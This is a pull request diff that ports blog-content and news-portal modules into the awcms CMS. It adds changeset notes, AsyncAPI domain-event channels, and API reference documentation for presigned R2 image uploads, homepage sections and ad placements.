### PR TITLE
feat: port blog-content + news-portal modules from awcms-mini

### DIFF
--- a/.changeset/port-blog-content-module.md
+++ b/.changeset/port-blog-content-module.md
@@ -1,0 +1,7 @@
+---
+"awcms": minor
+---
+
+Port modul `blog_content` dari awcms-mini: manajemen blog/konten tenant-scoped (posts, pages, kategori/tag, riwayat revisi append-only, pencarian full-text, template/menu/widget/iklan presentasi, pengaturan blog, dan automatic internal tag linking). Menambahkan 6 migrasi baru (`sql/035`-`sql/040`, 15 tabel + seed 39 permission), ~40 route admin di `/api/v1/blog/*`, 7 route publik anonim di `/blog/{tenantCode}/...` (ADR-0009), job terjadwal `bun run blog:publish:scheduled`, serta fragment OpenAPI/AsyncAPI baru untuk modul ini.
+
+Dua kapabilitas opsional modul ini (`news_media` dari `news_portal`, `social_publishing` dari `social_publishing`) belum punya provider nyata di base ini — setiap titik panggil memakai adapter no-op modul sendiri (mode full-online-R2-only selalu tidak aktif, hook social-publishing selalu no-op `{ jobsCreated: 0 }`), aman dan terdokumentasi, tanpa mengimpor modul yang belum ada. Keluarga rute `/news/**` (butuh modul `tenant_domain` yang belum di-port) sengaja tidak diikutkan di port ini.

--- a/.changeset/port-news-portal-module.md
+++ b/.changeset/port-news-portal-module.md
@@ -1,0 +1,5 @@
+---
+"awcms": minor
+---
+
+Port modul `news_portal` dari awcms-mini: registry media objek R2-only tenant-scoped (`awcms_news_media_objects`) dengan alur presigned upload langsung-ke-R2 (create/finalize/cancel), homepage section composer editorial (`awcms_news_portal_homepage_sections`), ad placement preset R2-only (`awcms_news_portal_ad_placements`), state tenant mode R2-only (`awcms_news_portal_tenant_state`), dan job rekonsiliasi `news-media:reconcile`. Migrasi `sql/041`..`sql/045` (empat tabel baru RLS ENABLE+FORCE). Modul MENYEDIAKAN capability `news_media` — adapter nyata kini menggantikan no-op blog_content di seluruh composition root (route + worker `blog:publish:scheduled`) — dan MENGONSUMSI `public_content` blog_content untuk validasi referensi homepage section. Rute publik `/news/**` (butuh `tenant_domain`), halaman admin `.astro`, dan aktivasi preset (butuh subsistem preset `module_management`) sengaja di-drop dan didokumentasikan. Menambah aksi `verify` ke union `AccessAction`, grant `awcms_worker` untuk job rekonsiliasi, dan skrip `news-media:reconcile`.

--- a/asyncapi/awcms-domain-events.asyncapi.yaml
+++ b/asyncapi/awcms-domain-events.asyncapi.yaml
@@ -165,6 +165,255 @@ channels:
       contract only; producer is the structured JSON logger
       (`pages/api/v1/email/messages/[id]/cancel.ts`'s `email.message.cancelled`
       log line).
+  awcms.blog-content.post.created:
+    address: awcms.blog-content.post.created
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A blog post was created (draft). Ported from awcms-mini. Documented
+      contract only, same structured-logger-producer convention as
+      `awcms.email.*` above; producer is
+      `pages/api/v1/blog/posts/index.ts`'s `blog-content.post.created` log
+      line.
+  awcms.blog-content.post.updated:
+    address: awcms.blog-content.post.updated
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A blog post was updated. Documented contract only; producer is
+      `pages/api/v1/blog/posts/[id].ts`'s `blog-content.post.updated` log
+      line.
+  awcms.blog-content.post.submitted-for-review:
+    address: awcms.blog-content.post.submitted-for-review
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A blog post transitioned draft -> review. Documented contract only;
+      producer is `pages/api/v1/blog/posts/[id]/submit-review.ts`'s
+      `blog-content.post.submitted-for-review` log line.
+  awcms.blog-content.post.published:
+    address: awcms.blog-content.post.published
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A blog post was published (manually or by the scheduled-publish job).
+      Documented contract only; producer is
+      `pages/api/v1/blog/posts/[id]/publish.ts` /
+      `application/blog-scheduled-publish.ts`'s `blog-content.post.published`
+      log line.
+  awcms.blog-content.post.scheduled:
+    address: awcms.blog-content.post.scheduled
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A blog post was scheduled for future publishing. Documented contract
+      only; producer is `pages/api/v1/blog/posts/[id]/schedule.ts`'s
+      `blog-content.post.scheduled` log line.
+  awcms.blog-content.post.archived:
+    address: awcms.blog-content.post.archived
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A blog post was archived. Documented contract only; producer is
+      `pages/api/v1/blog/posts/[id]/archive.ts`'s `blog-content.post.archived`
+      log line.
+  awcms.blog-content.post.deleted:
+    address: awcms.blog-content.post.deleted
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A blog post was soft-deleted. Documented contract only; producer is
+      `pages/api/v1/blog/posts/[id].ts`'s `blog-content.post.deleted` log
+      line.
+  awcms.blog-content.post.restored:
+    address: awcms.blog-content.post.restored
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A soft-deleted blog post was restored. Documented contract only;
+      producer is `pages/api/v1/blog/posts/[id]/restore.ts`'s
+      `blog-content.post.restored` log line.
+  awcms.blog-content.post.purged:
+    address: awcms.blog-content.post.purged
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A soft-deleted blog post was permanently purged. Documented contract
+      only; producer is `pages/api/v1/blog/posts/[id]/purge.ts`'s
+      `blog-content.post.purged` log line.
+  awcms.blog-content.revision.created:
+    address: awcms.blog-content.revision.created
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      An append-only revision snapshot was created for a post/page (a
+      significant content change, or a revision restore). Documented
+      contract only; producer is
+      `application/blog-revision-directory.ts`'s `blog-content.revision.created`
+      log line.
+  awcms.blog-content.term.created:
+    address: awcms.blog-content.term.created
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A blog category/tag was created. Documented contract only; producer is
+      `pages/api/v1/blog/terms/index.ts`'s `blog-content.term.created` log
+      line.
+  awcms.blog-content.term.updated:
+    address: awcms.blog-content.term.updated
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A blog category/tag was updated or soft-deleted. Documented contract
+      only; producer is `pages/api/v1/blog/terms/[id].ts`'s
+      `blog-content.term.updated` log line.
+  awcms.blog-content.settings.updated:
+    address: awcms.blog-content.settings.updated
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A tenant's blog settings were updated. Documented contract only;
+      producer is `pages/api/v1/blog/settings/index.ts`'s
+      `blog-content.settings.updated` log line.
+  awcms.blog-content.template.created:
+    address: awcms.blog-content.template.created
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A presentation template was created. Documented contract only;
+      producer is `pages/api/v1/blog/templates/index.ts`'s
+      `blog-content.template.created` log line.
+  awcms.blog-content.template.updated:
+    address: awcms.blog-content.template.updated
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A presentation template was updated. Documented contract only;
+      producer is `pages/api/v1/blog/templates/[id].ts`'s
+      `blog-content.template.updated` log line.
+  awcms.blog-content.template.deleted:
+    address: awcms.blog-content.template.deleted
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A presentation template was soft-deleted. Documented contract only;
+      producer is `pages/api/v1/blog/templates/[id].ts`'s
+      `blog-content.template.deleted` log line.
+  awcms.blog-content.menu.created:
+    address: awcms.blog-content.menu.created
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A navigation menu was created. Documented contract only; producer is
+      `pages/api/v1/blog/menus/index.ts`'s `blog-content.menu.created` log
+      line.
+  awcms.blog-content.menu.updated:
+    address: awcms.blog-content.menu.updated
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A navigation menu (or its items tree) was updated. Documented contract
+      only; producer is `pages/api/v1/blog/menus/[id].ts`'s
+      `blog-content.menu.updated` log line.
+  awcms.blog-content.menu.deleted:
+    address: awcms.blog-content.menu.deleted
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A navigation menu was soft-deleted. Documented contract only; producer
+      is `pages/api/v1/blog/menus/[id].ts`'s `blog-content.menu.deleted` log
+      line.
+  awcms.blog-content.widget.created:
+    address: awcms.blog-content.widget.created
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A widget was created. Documented contract only; producer is
+      `pages/api/v1/blog/widgets/index.ts`'s `blog-content.widget.created`
+      log line.
+  awcms.blog-content.widget.updated:
+    address: awcms.blog-content.widget.updated
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A widget was updated. Documented contract only; producer is
+      `pages/api/v1/blog/widgets/[id].ts`'s `blog-content.widget.updated`
+      log line.
+  awcms.blog-content.widget.deleted:
+    address: awcms.blog-content.widget.deleted
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A widget was soft-deleted. Documented contract only; producer is
+      `pages/api/v1/blog/widgets/[id].ts`'s `blog-content.widget.deleted`
+      log line.
+  awcms.blog-content.ad.created:
+    address: awcms.blog-content.ad.created
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      An advertisement was created. Documented contract only; producer is
+      `pages/api/v1/blog/ads/index.ts`'s `blog-content.ad.created` log line.
+  awcms.blog-content.ad.updated:
+    address: awcms.blog-content.ad.updated
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      An advertisement (or its placements) was updated. Documented contract
+      only; producer is `pages/api/v1/blog/ads/[id].ts`'s
+      `blog-content.ad.updated` log line.
+  awcms.blog-content.ad.deleted:
+    address: awcms.blog-content.ad.deleted
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      An advertisement was soft-deleted. Documented contract only; producer
+      is `pages/api/v1/blog/ads/[id].ts`'s `blog-content.ad.deleted` log
+      line.
+  awcms.blog-content.theme.updated:
+    address: awcms.blog-content.theme.updated
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A tenant's blog theme mode override was updated. Documented contract
+      only; producer is `pages/api/v1/blog/theme/index.ts`'s
+      `blog-content.theme.updated` log line.
+  awcms.blog-content.internal-tag-linking-policy.updated:
+    address: awcms.blog-content.internal-tag-linking-policy.updated
+    messages:
+      DomainEvent:
+        $ref: "#/components/messages/DomainEvent"
+    description: >-
+      A tenant's automatic internal tag linking policy was updated.
+      Documented contract only; producer is
+      `pages/api/v1/blog/internal-tag-links/settings.ts`'s
+      `blog-content.internal-tag-linking-policy.updated` log line.
 operations:
   publishDomainEventRuntimeSampleRecorded:
     action: send
@@ -256,6 +505,168 @@ operations:
       $ref: "#/channels/awcms.email.message.cancelled"
     messages:
       - $ref: "#/channels/awcms.email.message.cancelled/messages/DomainEvent"
+  publishBlogContentPostCreated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.post.created"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.post.created/messages/DomainEvent"
+  publishBlogContentPostUpdated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.post.updated"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.post.updated/messages/DomainEvent"
+  publishBlogContentPostSubmittedForReview:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.post.submitted-for-review"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.post.submitted-for-review/messages/DomainEvent"
+  publishBlogContentPostPublished:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.post.published"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.post.published/messages/DomainEvent"
+  publishBlogContentPostScheduled:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.post.scheduled"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.post.scheduled/messages/DomainEvent"
+  publishBlogContentPostArchived:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.post.archived"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.post.archived/messages/DomainEvent"
+  publishBlogContentPostDeleted:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.post.deleted"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.post.deleted/messages/DomainEvent"
+  publishBlogContentPostRestored:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.post.restored"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.post.restored/messages/DomainEvent"
+  publishBlogContentPostPurged:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.post.purged"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.post.purged/messages/DomainEvent"
+  publishBlogContentRevisionCreated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.revision.created"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.revision.created/messages/DomainEvent"
+  publishBlogContentTermCreated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.term.created"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.term.created/messages/DomainEvent"
+  publishBlogContentTermUpdated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.term.updated"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.term.updated/messages/DomainEvent"
+  publishBlogContentSettingsUpdated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.settings.updated"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.settings.updated/messages/DomainEvent"
+  publishBlogContentTemplateCreated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.template.created"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.template.created/messages/DomainEvent"
+  publishBlogContentTemplateUpdated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.template.updated"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.template.updated/messages/DomainEvent"
+  publishBlogContentTemplateDeleted:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.template.deleted"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.template.deleted/messages/DomainEvent"
+  publishBlogContentMenuCreated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.menu.created"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.menu.created/messages/DomainEvent"
+  publishBlogContentMenuUpdated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.menu.updated"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.menu.updated/messages/DomainEvent"
+  publishBlogContentMenuDeleted:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.menu.deleted"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.menu.deleted/messages/DomainEvent"
+  publishBlogContentWidgetCreated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.widget.created"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.widget.created/messages/DomainEvent"
+  publishBlogContentWidgetUpdated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.widget.updated"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.widget.updated/messages/DomainEvent"
+  publishBlogContentWidgetDeleted:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.widget.deleted"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.widget.deleted/messages/DomainEvent"
+  publishBlogContentAdCreated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.ad.created"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.ad.created/messages/DomainEvent"
+  publishBlogContentAdUpdated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.ad.updated"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.ad.updated/messages/DomainEvent"
+  publishBlogContentAdDeleted:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.ad.deleted"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.ad.deleted/messages/DomainEvent"
+  publishBlogContentThemeUpdated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.theme.updated"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.theme.updated/messages/DomainEvent"
+  publishBlogContentInternalTagLinkingPolicyUpdated:
+    action: send
+    channel:
+      $ref: "#/channels/awcms.blog-content.internal-tag-linking-policy.updated"
+    messages:
+      - $ref: "#/channels/awcms.blog-content.internal-tag-linking-policy.updated/messages/DomainEvent"
 components:
   messages:
     DomainEvent:

--- a/docs/awcms/api-reference.md
+++ b/docs/awcms/api-reference.md
@@ -3644,6 +3644,299 @@ Read-only: validate a proposed theme config against its theme descriptor and, wh
 | 401    | Missing or invalid session.                     | [`ApiError`](#standard-error-envelope) |
 | 403    | Access denied by RBAC/ABAC.                     | [`ApiError`](#standard-error-envelope) |
 
+## News Media
+
+Direct-to-R2 presigned upload flow for news images (news_portal module, ported from awcms-mini) — create an upload session (server-generated object key + short-lived presigned PUT URL), finalize (real R2 GET + magic-byte MIME sniffing + server-side SHA-256 checksum, never a bare HEAD), and cancel a still-pending_upload session. R2 credentials are never exposed to the browser; only a scoped, expiring presigned URL is returned.
+
+### `POST /api/v1/media/news-images/upload-sessions` — Create a direct-to-R2 presigned upload session for a news image
+
+- **operationId**: `newsMediaUploadSessionsCreate`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.media.create. Returns a `pending_upload` metadata row plus a short-lived presigned PUT URL scoped to exactly one server-generated object key. Raw R2 credentials are never exposed to the browser.
+
+**Parameters**
+
+| Name               | In     | Required | Type   | Description |
+| ------------------ | ------ | -------- | ------ | ----------- |
+| `X-Correlation-ID` | header | no       | string |             |
+
+**Request body** (required): [`CreateNewsMediaUploadSessionRequest`](#schema-createnewsmediauploadsessionrequest)
+
+**Responses**
+
+| Status | Description                                                                                    | Schema                                 |
+| ------ | ---------------------------------------------------------------------------------------------- | -------------------------------------- |
+| 200    | Upload session created — a `pending_upload` metadata row plus a short-lived presigned PUT URL. | object                                 |
+| 400    | Validation error.                                                                              | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session.                                                                    | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC.                                                                    | [`ApiError`](#standard-error-envelope) |
+| 502    | News media R2 storage is not configured/enabled for this deployment.                           | [`ApiError`](#standard-error-envelope) |
+
+### `POST /api/v1/media/news-images/upload-sessions/{id}/cancel` — Cancel a still-pending-upload session
+
+- **operationId**: `newsMediaUploadSessionsCancel`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.media.cancel. Transitions a `pending_upload` session to `failed`.
+
+**Parameters**
+
+| Name               | In     | Required | Type          | Description |
+| ------------------ | ------ | -------- | ------------- | ----------- |
+| `id`               | path   | yes      | string (uuid) |             |
+| `X-Correlation-ID` | header | no       | string        |             |
+
+**Responses**
+
+| Status | Description                                                                         | Schema                                 |
+| ------ | ----------------------------------------------------------------------------------- | -------------------------------------- |
+| 200    | Upload session cancelled (status `failed`).                                         | object                                 |
+| 400    | Validation error.                                                                   | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session.                                                         | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC.                                                         | [`ApiError`](#standard-error-envelope) |
+| 404    | Resource not found.                                                                 | [`ApiError`](#standard-error-envelope) |
+| 409    | Upload session is not `pending_upload` (already uploaded/verified/attached/failed). | [`ApiError`](#standard-error-envelope) |
+
+### `POST /api/v1/media/news-images/upload-sessions/{id}/finalize` — Finalize an upload session — real R2 GET + magic-byte MIME sniffing + server-side SHA-256 checksum (never a bare HEAD)
+
+- **operationId**: `newsMediaUploadSessionsFinalize`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.media.verify. High-risk, requires Idempotency-Key. Verifies the object actually uploaded to R2 (HEAD for existence/real size, then a full GET), sniffs the MIME type from the object's real magic bytes, and computes a SHA-256 checksum server-side. A client-claimed `checksumSha256` is only a transport-corruption cross-check, never a substitute for the MIME sniff — HEAD alone can never promote a media object to `verified`.
+
+**Parameters**
+
+| Name               | In     | Required | Type          | Description |
+| ------------------ | ------ | -------- | ------------- | ----------- |
+| `id`               | path   | yes      | string (uuid) |             |
+| `Idempotency-Key`  | header | yes      | string        |             |
+| `X-Correlation-ID` | header | no       | string        |             |
+
+**Request body** (optional): [`FinalizeNewsMediaUploadSessionRequest`](#schema-finalizenewsmediauploadsessionrequest)
+
+**Responses**
+
+| Status | Description                                                                                                                                                                                                                        | Schema                                 |
+| ------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------- |
+| 200    | Object verified — media object status is now `verified` (or an idempotent replay).                                                                                                                                                 | object                                 |
+| 400    | Validation error.                                                                                                                                                                                                                  | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session.                                                                                                                                                                                                        | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC.                                                                                                                                                                                                        | [`ApiError`](#standard-error-envelope) |
+| 404    | Resource not found.                                                                                                                                                                                                                | [`ApiError`](#standard-error-envelope) |
+| 409    | Upload session is not `pending_upload`, has expired (`UPLOAD_SESSION_EXPIRED`), or the Idempotency-Key was reused with a different request (`IDEMPOTENCY_CONFLICT`).                                                               | [`ApiError`](#standard-error-envelope) |
+| 422    | Uploaded object failed content verification (`UPLOAD_VERIFICATION_FAILED`). `error.details.reason` is one of `object_not_found`, `size_exceeded`, `mime_not_recognized`, `mime_not_allowed`, `mime_mismatch`, `checksum_mismatch`. | [`ApiError`](#standard-error-envelope) |
+| 502    | Unable to verify the uploaded object right now (R2 provider error/circuit breaker open) — retry shortly.                                                                                                                           | [`ApiError`](#standard-error-envelope) |
+
+## News Portal Homepage Sections
+
+Editorial homepage section composer (news_portal module) — tenant-scoped, RLS-protected CRUD for configurable homepage sections (headline, latest_posts, featured_posts, editor_picks, category_grid, gallery_block). config shape is validated per sectionType server-side; every referenced post/category/media object must already exist for the same tenant (and gallery_block media must be a verified R2 media object). sectionType is immutable after creation; reordering is just a patchable sortOrder field.
+
+### `GET /api/v1/news-portal/homepage-sections` — List this tenant's homepage sections (admin view)
+
+- **operationId**: `newsPortalHomepageSectionsList`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.homepage_sections.read.
+
+**Parameters**
+
+| Name               | In     | Required | Type   | Description |
+| ------------------ | ------ | -------- | ------ | ----------- |
+| `X-Correlation-ID` | header | no       | string |             |
+
+**Responses**
+
+| Status | Description                 | Schema                                 |
+| ------ | --------------------------- | -------------------------------------- |
+| 200    | Homepage sections.          | object                                 |
+| 400    | Validation error.           | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session. | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC. | [`ApiError`](#standard-error-envelope) |
+
+### `POST /api/v1/news-portal/homepage-sections` — Create a homepage section
+
+- **operationId**: `newsPortalHomepageSectionsCreate`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.homepage_sections.configure. `config` is validated per `sectionType`; every referenced post/category/media object must already exist for this tenant (and gallery_block media must be a verified R2 media object).
+
+**Parameters**
+
+| Name               | In     | Required | Type   | Description |
+| ------------------ | ------ | -------- | ------ | ----------- |
+| `X-Correlation-ID` | header | no       | string |             |
+
+**Request body** (required): [`HomepageSectionCreateRequest`](#schema-homepagesectioncreaterequest)
+
+**Responses**
+
+| Status | Description                                                                                                                              | Schema                                 |
+| ------ | ---------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------- |
+| 200    | Homepage section created.                                                                                                                | object                                 |
+| 400    | Validation error.                                                                                                                        | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session.                                                                                                              | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC.                                                                                                              | [`ApiError`](#standard-error-envelope) |
+| 409    | sectionKey is already in use for this tenant.                                                                                            | [`ApiError`](#standard-error-envelope) |
+| 422    | config references content that does not exist, does not belong to this tenant, or (for gallery_block) is not a verified R2 media object. | [`ApiError`](#standard-error-envelope) |
+
+### `PATCH /api/v1/news-portal/homepage-sections/{id}` — Update a homepage section (title/config/sortOrder/isEnabled/schedule) — sectionType is immutable
+
+- **operationId**: `newsPortalHomepageSectionsUpdate`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.homepage_sections.configure.
+
+**Parameters**
+
+| Name               | In     | Required | Type          | Description |
+| ------------------ | ------ | -------- | ------------- | ----------- |
+| `id`               | path   | yes      | string (uuid) |             |
+| `X-Correlation-ID` | header | no       | string        |             |
+
+**Request body** (required): [`HomepageSectionUpdateRequest`](#schema-homepagesectionupdaterequest)
+
+**Responses**
+
+| Status | Description                                                                                                                              | Schema                                 |
+| ------ | ---------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------- |
+| 200    | Homepage section updated.                                                                                                                | object                                 |
+| 400    | Validation error.                                                                                                                        | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session.                                                                                                              | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC.                                                                                                              | [`ApiError`](#standard-error-envelope) |
+| 404    | Resource not found.                                                                                                                      | [`ApiError`](#standard-error-envelope) |
+| 422    | config references content that does not exist, does not belong to this tenant, or (for gallery_block) is not a verified R2 media object. | [`ApiError`](#standard-error-envelope) |
+
+### `DELETE /api/v1/news-portal/homepage-sections/{id}` — Soft-delete a homepage section
+
+- **operationId**: `newsPortalHomepageSectionsDelete`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.homepage_sections.configure.
+
+**Parameters**
+
+| Name               | In     | Required | Type          | Description |
+| ------------------ | ------ | -------- | ------------- | ----------- |
+| `id`               | path   | yes      | string (uuid) |             |
+| `X-Correlation-ID` | header | no       | string        |             |
+
+**Request body** (required): object
+
+**Responses**
+
+| Status | Description                 | Schema                                 |
+| ------ | --------------------------- | -------------------------------------- |
+| 200    | Homepage section deleted.   | object                                 |
+| 400    | Validation error.           | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session. | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC. | [`ApiError`](#standard-error-envelope) |
+| 404    | Resource not found.         | [`ApiError`](#standard-error-envelope) |
+
+## News Portal Ad Placements
+
+R2-only advertisement placement presets for the news portal (news_portal module) — tenant-scoped, RLS-protected CRUD for ads assigned to a fixed set of placement keys. mediaObjectId must reference a verified R2 media object belonging to the same tenant — never a local path or arbitrary external image URL. linkUrl is optional and may be external, but is validated server-side as an absolute http(s) URL only.
+
+### `GET /api/v1/news-portal/ad-placements` — List this tenant's ad placements (admin view)
+
+- **operationId**: `newsPortalAdPlacementsList`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.ad_placements.read.
+
+**Parameters**
+
+| Name               | In     | Required | Type   | Description |
+| ------------------ | ------ | -------- | ------ | ----------- |
+| `X-Correlation-ID` | header | no       | string |             |
+
+**Responses**
+
+| Status | Description                 | Schema                                 |
+| ------ | --------------------------- | -------------------------------------- |
+| 200    | Ad placements.              | object                                 |
+| 400    | Validation error.           | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session. | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC. | [`ApiError`](#standard-error-envelope) |
+
+### `POST /api/v1/news-portal/ad-placements` — Create an ad placement (R2-only image, verified media object required)
+
+- **operationId**: `newsPortalAdPlacementsCreate`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.ad_placements.configure. `mediaObjectId` must reference a verified (`verified`/`attached`) R2 media object for this tenant.
+
+**Parameters**
+
+| Name               | In     | Required | Type   | Description |
+| ------------------ | ------ | -------- | ------ | ----------- |
+| `X-Correlation-ID` | header | no       | string |             |
+
+**Request body** (required): [`AdPlacementCreateRequest`](#schema-adplacementcreaterequest)
+
+**Responses**
+
+| Status | Description                                                                                                                                               | Schema                                 |
+| ------ | --------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------- |
+| 200    | Ad placement created.                                                                                                                                     | object                                 |
+| 400    | Validation error.                                                                                                                                         | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session.                                                                                                                               | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC.                                                                                                                               | [`ApiError`](#standard-error-envelope) |
+| 422    | mediaObjectId does not exist, does not belong to this tenant, is not a verified R2 media object, or is not an allowed mime type for the target placement. | [`ApiError`](#standard-error-envelope) |
+
+### `PATCH /api/v1/news-portal/ad-placements/{id}` — Update an ad placement (media reference/link/rotation/schedule/active)
+
+- **operationId**: `newsPortalAdPlacementsUpdate`
+- **Security**: bearerAuth + tenantHeader
+
+Gated by news_portal.ad_placements.configure.
+
+**Parameters**
+
+| Name               | In     | Required | Type          | Description |
+| ------------------ | ------ | -------- | ------------- | ----------- |
+| `id`               | path   | yes      | string (uuid) |             |
+| `X-Correlation-ID` | header | no       | string        |             |
+
+**Request body** (required): [`AdPlacementUpdateRequest`](#schema-adplacementupdaterequest)
+
+**Responses**
+
+| Status | Description                                                                                                                                               | Schema                                 |
+| ------ | --------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------- |
+| 200    | Ad placement updated.                                                                                                                                     | object                                 |
+| 400    | Validation error.                                                                                                                                         | [`ApiError`](#standard-error-envelope) |
+| 401    | Missing or invalid session.                                                                                                                               | [`ApiError`](#standard-error-envelope) |
+| 403    | Access denied by RBAC/ABAC.                                                                                                                               | [`ApiError`](#standard-error-envelope) |
